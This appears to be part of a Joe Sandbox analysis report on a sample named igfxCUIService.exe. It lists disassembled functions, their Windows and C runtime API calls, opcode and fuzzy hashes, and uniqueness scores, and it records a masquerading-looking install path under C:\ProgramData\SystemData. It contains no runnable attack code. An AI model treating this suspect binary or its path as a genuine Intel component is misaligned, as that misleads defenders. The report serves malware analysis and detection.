                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alloca_probe_16__freea$Info
                                  • String ID:
                                  • API String ID: 2330168043-0
                                  • Opcode ID: 08f498da20941d0490539929c8044d9599733b771ffea7cc75bfa58fc02d8d8a
                                  • Instruction ID: 8d06515ff86be065e1a266bfccaf0a9b1f028a0c5a9a134a5adaa4ce7782a68f
                                  • Opcode Fuzzy Hash: 08f498da20941d0490539929c8044d9599733b771ffea7cc75bfa58fc02d8d8a
                                  • Instruction Fuzzy Hash: D581D372D00219ABDF209E658881FEF7BB5DF4A31AF1C0155EC54A7241E761CC88CBB2
                                  Uniqueness

                                  Uniqueness Score: 5.06%

                                  Function 00D4FC3E, Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                  Download Yara Rule
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00D4FCC2
                                  • __alloca_probe_16.LIBCMT ref: 00D4FD88
                                  • __freea.LIBCMT ref: 00D4FDF4
                                    • Part of subcall function 00D4690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  • __freea.LIBCMT ref: 00D4FDFD
                                  • __freea.LIBCMT ref: 00D4FE20
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                  • String ID:
                                  • API String ID: 1423051803-0
                                  • Opcode ID: 628a6f9f4ee263efc596f3a3fdab03f6705490c7e86c725320c5cf086cff5853
                                  • Instruction ID: 6642fc216f4a5510e5cfbcccf001b2c919fb88df6e1c33c51374261d8816c4d7
                                  • Opcode Fuzzy Hash: 628a6f9f4ee263efc596f3a3fdab03f6705490c7e86c725320c5cf086cff5853
                                  • Instruction Fuzzy Hash: F451B07290021AABEF259F64CC82EBB36A9EF45760F294139FD05A7161EB70DC5186B0
                                  Uniqueness

                                  Uniqueness Score: 0.98%

                                  Function 00D44561, Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D4690D: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  • _free.LIBCMT ref: 00D44670
                                  • _free.LIBCMT ref: 00D44687
                                  • _free.LIBCMT ref: 00D446A4
                                  • _free.LIBCMT ref: 00D446BF
                                  • _free.LIBCMT ref: 00D446D6
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 1f476168361ac1cdd28f085445439a418272701d3a22ce57f6319e6616949949
                                  • Instruction ID: d5c1598a3a0781fe71f557590eda45bd29c26217650dad4d15e5b36e49301103
                                  • Opcode Fuzzy Hash: 1f476168361ac1cdd28f085445439a418272701d3a22ce57f6319e6616949949
                                  • Instruction Fuzzy Hash: 3651F471A00304AFDB20DF69CC41BAA77F5EF46324F194669E849D7290E731DA40CBB0
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D35EC7, Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00D35F10
                                  • __alloca_probe_16.LIBCMT ref: 00D35F3C
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00D35F7B
                                  • __alloca_probe_16.LIBCMT ref: 00D35FEF
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D36050
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2135360126-0
                                  • Opcode ID: 8c45d8b35a63243a6f2c01e316753917fb855fb478579cb4cff563b7a388b0cc
                                  • Instruction ID: a701585f66e5109cc3a1642b922dbd8b2cc3ae7bf5fe76a5368444130e750100
                                  • Opcode Fuzzy Hash: 8c45d8b35a63243a6f2c01e316753917fb855fb478579cb4cff563b7a388b0cc
                                  • Instruction Fuzzy Hash: 1151BD7290021ABBDF259F64DC42EAF7BA9EF40750F198129FD14A6154EB75CD20CBB0
                                  Uniqueness

                                  Uniqueness Score: 10.55%

                                  Function 00D2A760, Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D2A78D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D2A7AD
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D2A7CD
                                  • std::_Facet_Register.LIBCPMT ref: 00D2A86B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D2A883
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: 5ffc2a86b66550b077780a16be13100cfd55c70e09e47bd8608bc0210a5db057
                                  • Instruction ID: 2853c38a63b652d5f08bef33e2777828370aa8732392b588fe4e3503769bdfd3
                                  • Opcode Fuzzy Hash: 5ffc2a86b66550b077780a16be13100cfd55c70e09e47bd8608bc0210a5db057
                                  • Instruction Fuzzy Hash: 58419171900224DFCB18DF58E881BAABBB4EF14714F14416DE805AB391EB71AD46CBF2
                                  Uniqueness

                                  Uniqueness Score: 0.53%

                                  Function 00D4CFBA, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00D4CFD2
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4CFE4
                                  • _free.LIBCMT ref: 00D4CFF6
                                  • _free.LIBCMT ref: 00D4D008
                                  • _free.LIBCMT ref: 00D4D01A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5d4f3e9301c546caaf194652081b34b1a1f8b7b72de5fa4f77ed3607f5b6b78b
                                  • Instruction ID: f9acaef22bff10adbf7dcf823087888bd9f6e4e8a256d2d6bafa7f275a87189d
                                  • Opcode Fuzzy Hash: 5d4f3e9301c546caaf194652081b34b1a1f8b7b72de5fa4f77ed3607f5b6b78b
                                  • Instruction Fuzzy Hash: DBF03632505760A78620EB94F481C1B73DBEF037107580915F016D7A81CB7CFC8087B5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D1A230, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D1A484
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: <$?$mxyz
                                  • API String ID: 118556049-2422011075
                                  • Opcode ID: 31f141627b44d42c5ffdefe9f82d67f390b46307052a94e8336927df0208a35e
                                  • Instruction ID: 0986d7296f5d19611ec23d242820d67738cf0e11a2e69841eab2450782752d62
                                  • Opcode Fuzzy Hash: 31f141627b44d42c5ffdefe9f82d67f390b46307052a94e8336927df0208a35e
                                  • Instruction Fuzzy Hash: 33610671D00248DBDB14DFA8D8447EEBBB4EF44314F14462DE415AB382DBB59A85C7B1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D13420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D1362E
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D1363D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 91afcd7988a1aa4e63a59d2ecd8e60437bcdcec2777d904bdfe22156c7e0f392
                                  • Instruction ID: 361995ee5ae7e9cbe3723aa229c68eb4ba5131f1fcbaf95b3734a78fab4071b6
                                  • Opcode Fuzzy Hash: 91afcd7988a1aa4e63a59d2ecd8e60437bcdcec2777d904bdfe22156c7e0f392
                                  • Instruction Fuzzy Hash: F451E3719002489FEB18CFA8DD45B9DFBB6EF85704F10865CE404A7392DB75DA848B70
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D42C71, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C:\ProgramData\SystemData\igfxCUIService.exe
                                  • API String ID: 0-411192752
                                  • Opcode ID: 194277f492c5781ddead5926f55dd97a1d6d0857bcfeec2107c90b15e88bccd9
                                  • Instruction ID: 6d0c8b32ce6500b51f6069d1b3179ddb5e427b809e3fd82335e9e8a0bb2f687f
                                  • Opcode Fuzzy Hash: 194277f492c5781ddead5926f55dd97a1d6d0857bcfeec2107c90b15e88bccd9
                                  • Instruction Fuzzy Hash: BD317071E00714ABCB21DF99D885AAEBBB8EF89310B94406AF405E7251D7B09E44CBB0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D12BD0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D12C5F
                                    • Part of subcall function 00D3731A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D121DC,?,?,?,00D121DC,?,00D6D414), ref: 00D3737A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: a42b554ce43014957190152456c2c16ee1411f528fc9041e20209179efaf4edc
                                  • Instruction ID: afea3b00a7c3ac831a32b897bb7819733d9ad602b6a35e48d105b9395163c4c3
                                  • Opcode Fuzzy Hash: a42b554ce43014957190152456c2c16ee1411f528fc9041e20209179efaf4edc
                                  • Instruction Fuzzy Hash: AD1103B15047046BC710DF58D842BA6B3E8EF51310F148A2AF9548BA41EB71E9A4CBB5
                                  Uniqueness

                                  Uniqueness Score: 7.75%

                                  Function 00D4727B, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction ID: b5761b1db5ec977d2eb8ca3a90d9083849ef0e4332de96a9749aea9d2577004a
                                  • Opcode Fuzzy Hash: 30215aa7633be5a151444ef3af0f45258a63018f10652b0b38a6e06bf638477f
                                  • Instruction Fuzzy Hash: A7B104729082969FDF11CF68C881BBEBBE5EF55350F2981AAE8959B241D734CD01CB70
                                  Uniqueness

                                  Uniqueness Score: 0.57%

                                  Function 00D38FD1, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 3bc2d7bf8cb0310a7c803761b8c0ffa9d1a9e161ab6a3a1f88319d1d8fc0d36d
                                  • Instruction ID: 763ab4f2c6cb3576bdfb3344aff1c783f2c1c4ed2fc70a8cc9d9b317fff9201d
                                  • Opcode Fuzzy Hash: 3bc2d7bf8cb0310a7c803761b8c0ffa9d1a9e161ab6a3a1f88319d1d8fc0d36d
                                  • Instruction Fuzzy Hash: BC51F5B2A047069FDB298F14D865B7AF7A4EF40710F18452DEC4657291E7B2ED40D7B0
                                  Uniqueness

                                  Uniqueness Score: 1.18%

                                  Function 00D26D40, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000004,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E01
                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E15
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D26E31
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D26E59
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: 25e7db7a68214417408d02f55875310b9584bd32e1e4a5a968e79d83735c5815
                                  • Instruction ID: 701a2b88894c3eff55344f6b14d29c0d6a7d39236454bcf80f50b1bc77dcd987
                                  • Opcode Fuzzy Hash: 25e7db7a68214417408d02f55875310b9584bd32e1e4a5a968e79d83735c5815
                                  • Instruction Fuzzy Hash: EE41D476B40325FBDB205FA8FC41BAABB65EF24715F244129FE05E6180EB71E91087B1
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 00D558AE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00D5597E
                                  • _free.LIBCMT ref: 00D559A7
                                  • SetEndOfFile.KERNEL32(00000000,00D53F56,00000000,00D48E9C,?,?,?,?,?,?,?,00D53F56,00D48E9C,00000000), ref: 00D559D9
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D53F56,00D48E9C,00000000,?,?,?,?,00000000), ref: 00D559F5
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: 6e0c7b07462ccbc369282568cd5afad4d60b5c2eb5bdb86f661fa043acfbdf38
                                  • Instruction ID: c4304d2586fcbc0e587b71bf6009862a35e12e91f0abd12b413c30aa24a0e536
                                  • Opcode Fuzzy Hash: 6e0c7b07462ccbc369282568cd5afad4d60b5c2eb5bdb86f661fa043acfbdf38
                                  • Instruction Fuzzy Hash: B241B476900A45EBDF12ABA8DC56B9D77A5EF45372F180210FD24EB195EA38CC488F31
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  Function 00D46F6D, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                  • _free.LIBCMT ref: 00D46FCF
                                  • _free.LIBCMT ref: 00D47005
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 866d10844e87028f72ebead2e691097158a2ee12b37655b85e1e4dfd3fecffbf
                                  • Instruction ID: ddfc000b5f56e508e1b126da68e029b787eec45e7ae12b90f7cb207caf011fcf
                                  • Opcode Fuzzy Hash: 866d10844e87028f72ebead2e691097158a2ee12b37655b85e1e4dfd3fecffbf
                                  • Instruction Fuzzy Hash: 2A1136322047116FDA11327ABC81D2B26A9CFC3375B290234F622C22D5DE75CC086172
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  Function 00D470C4, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00D4185C,00D46950,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D470C9
                                  • _free.LIBCMT ref: 00D47126
                                  • _free.LIBCMT ref: 00D4715C
                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00D4185C,00D46950,?,?,00D348E0,?,?,00D28B4A,?), ref: 00D47167
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: fb0e7c61bcce5985b75bceed4d8b4f558b07f81dfe8f5d912bd41a64d4aeadee
                                  • Instruction ID: e3c4c3aefe08d0a79c3139c93f7346114d36dbaef86f6b90e5dc68ca4ae4fe67
                                  • Opcode Fuzzy Hash: fb0e7c61bcce5985b75bceed4d8b4f558b07f81dfe8f5d912bd41a64d4aeadee
                                  • Instruction Fuzzy Hash: 6F1108326083116BEA20377A9C85D2B63AADBC37B5B290234F525D22E1DFB5CC05A172
                                  Uniqueness

                                  Uniqueness Score: 0.28%

                                  Function 00D557A2, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000), ref: 00D557B9
                                  • GetLastError.KERNEL32(?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?,00000000,?,00D4895B,?), ref: 00D557C5
                                    • Part of subcall function 00D5578B: CloseHandle.KERNEL32(FFFFFFFE,00D557D5,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?,00000000), ref: 00D5579B
                                  • ___initconout.LIBCMT ref: 00D557D5
                                    • Part of subcall function 00D5574D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D5577C,00D5328A,00000000,?,00D48407,?,00D41707,00000000,?), ref: 00D55760
                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00D5329D,00000000,00000001,00000000,00000000,?,00D48407,?,00D41707,00000000,?), ref: 00D557EA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: a5e0be221eec9a9cd54e7fc6ffed430bbd67e1eead13a061f9e53cd9558bb470
                                  • Instruction ID: 941f78a3551d6be6c0a9c16440f44e57b36d5d9b45b9a85275ef3136451e1315
                                  • Opcode Fuzzy Hash: a5e0be221eec9a9cd54e7fc6ffed430bbd67e1eead13a061f9e53cd9558bb470
                                  • Instruction Fuzzy Hash: 18F01C3A401724FBCF621FD9EC0998A3F66EF093A2B044510FF19D6234D6328820DBB1
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 00D3467D, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • SleepConditionVariableCS.KERNELBASE(?,00D3461A,00000064), ref: 00D346A0
                                  • LeaveCriticalSection.KERNEL32(00D6F1D8,?,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346AA
                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346BB
                                  • EnterCriticalSection.KERNEL32(00D6F1D8,?,00D3461A,00000064,?,00D7013C,?,00D14124,00D701A8,00D7013C,00D1834F,F0B87680,0000000F,?,00000000), ref: 00D346C2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
